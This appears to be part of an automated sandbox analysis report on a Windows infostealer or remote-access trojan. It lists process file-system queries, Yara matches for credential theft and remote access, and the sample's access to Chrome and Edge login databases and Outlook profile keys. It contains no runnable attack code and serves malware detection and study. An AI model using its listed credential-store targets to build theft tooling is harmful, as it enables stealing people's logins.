                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2918C GetLocalTime,4_2_02B2918C
                        Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B2B70C GetVersionExA,4_2_02B2B70C
                        Source: C:\Users\Public\Libraries\rpkhzpuO.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.36680000.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2d0c3f56.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34ad3d90.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.36680000.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.rpkhzpuO.pif.2b351240.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2f7c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fd95570.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.rpkhzpuO.pif.31ae57d0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2d0c4e5e.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.264e5570.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2ff20000.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.27a90f08.15.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.25173f56.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2f7c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.35f30f08.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.35f30f08.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fdd3d90.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e323d90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e2e6478.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.25174e5e.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2ecd0f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.rpkhzpuO.pif.2350ac48.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e323d90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34ad3d90.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.35f30000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.280c0000.17.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.rpkhzpuO.pif.2d0ead88.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34a95570.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2eaa3f56.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.25174e5e.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.312b0000.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.26523d90.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2ecd0000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2d0c3f56.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e2e5570.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.rpkhzpuO.pif.31ae57d0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.33783f56.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.33784e5e.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2ecd0000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.280c0000.17.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.27a90f08.15.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2f7c0f08.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.33783f56.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.312b0000.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fdd3d90.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2eaa3f56.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.33784e5e.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2f7c0f08.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e2e5570.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e2e6478.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34a96478.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.35f30000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.27a90000.16.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.rpkhzpuO.pif.2d0ead88.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34a95570.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2ff20000.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.27a90000.16.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fd95570.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2eaa4e5e.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.rpkhzpuO.pif.2b351240.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2d0c4e5e.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.264e6478.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fd96478.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2eaa4e5e.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2ecd0f08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.25173f56.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34a96478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.264e5570.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fd96478.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.2653675351.000000002FF20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.2704916181.00000000312B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2277062923.00000000280C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2629075725.0000000036680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000002.3379727606.0000000002A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.3379727606.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.36680000.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2d0c3f56.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34ad3d90.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.36680000.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.rpkhzpuO.pif.2b351240.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2f7c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fd95570.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.rpkhzpuO.pif.31ae57d0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2d0c4e5e.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.264e5570.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2ff20000.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.27a90f08.15.unpack, type: UNPACKEDPE
